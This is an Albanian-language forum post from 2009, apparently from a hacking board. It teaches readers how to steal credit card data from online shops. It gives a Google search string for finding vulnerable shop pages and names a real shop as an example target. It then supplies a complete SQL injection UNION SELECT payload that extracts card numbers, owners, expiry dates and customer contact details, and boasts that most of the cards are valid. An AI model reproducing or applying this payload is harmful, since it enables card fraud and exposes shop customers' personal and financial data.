Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi. 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 si të gjejm CC valide ,duke hackur SHOP ONLINE

Shko poshtë 
AutoriMesazh
NoIsY
Super moderator
Super moderator


Postimet : 454
Vendodhja : n'Kamenic
Puna / Hobi : Hacker

MesazhTitulli: si të gjejm CC valide ,duke hackur SHOP ONLINE   Wed Dec 16, 2009 6:30 am

eshte shum e thjesht weq duhet me pas men

(METODA SQL INJECTION)
Pershendetja Antar te dashur !! , e sho se ka kerkesa te shumta per CREDIT CART !! , dhe vendosa ta bej nje Mesim , si te

merreni edhe ju vet , pa lutur as kend !!


Pra fillojmSe pari e hapim google.Com
Dhe hym kerkojm keshtu : inurl:\\" customer_testimonials.php?testimonial_id=

¨
Pastaj ju dalin , te gjitha faqet SHOPING , te cilat to ti hackojm CREDIT CARTAT E TYRE


Pra masi keni kerkuar ne google !!


E merrenje nje web faqe e cila ju ka dalur aty , ja nje P.SH


https://www.opticclear.com/customer_...timonial_id=11


Tani ne duhet qe te ja shtojm nje COD MBRAPA SQL INJECTION codi esht ky:

1+union+select+1,2,concat(orders_id,0x2F,cc_type,0
x2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,c
ustomers_street_address,0x2F,customer

s_suburb,0x2F,customers_city,0x2F,customers_postco
de,0x2F,customers_state,0x2F,customers_country,0x2
F,customers_telephone,0x2F,customers

_email_address,0x2F,date_purchased),4,5,6,7,8+from +orders+

Masi te ja shtojm ket ! DO BAHET KESHTU !!


Kodi:

https://www.opticclear.com/customer_...ner,0x2F,cc_nu

mber,0x2F,cc_expires,0x2F,customers_street_address
,0x2F,customers_suburb,0x2F,customers_city,0x2F,cu
stomers_postcode,0x2F,customers_stat

e,0x2F,customers_country,0x2F,customers_telephone, 0x2F,customers_email_address,0x2F,date_purchased), 4,5,6,7,8+from+orders+

Dhe pastaj do ju dalin te gjitha CREDIT CARTAT , shiqoni mud te ket ndoshta edhe jo valide , po shumica jon 2009 VALIDE !!


SHIQO DREJT PER DREJT: https://www.opticclear.com/customer_...l_id=1+union+s

elect+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_ow ner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers_

street_address,0x2F,customers_suburb,0x2F,customer s_city,0x2F,customers_postcode,0x2F,customers_stat

e,0x2F,customers_country,0x2F,customers_telephone, 0x2F,customers_email_address,0x2F,date_purchased), 4,5,6,7,8+from+orders+


GJdo her shiqoni ka funi jon me te reja aty nalt jon me te vjetra CREDIT CART


Pra shpresoj se me keni kuptuar !!
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.deshira-juaj.tk/
 
si të gjejm CC valide ,duke hackur SHOP ONLINE
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Interpretimi i Endrrave - nga Tanki
» Letrat (Tarot)
» Enderrat Lucide
» Misteri i një anije kozmike
» Rrathët në Grurë - Crop Circle

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: HaCkinG-
Kërce tek: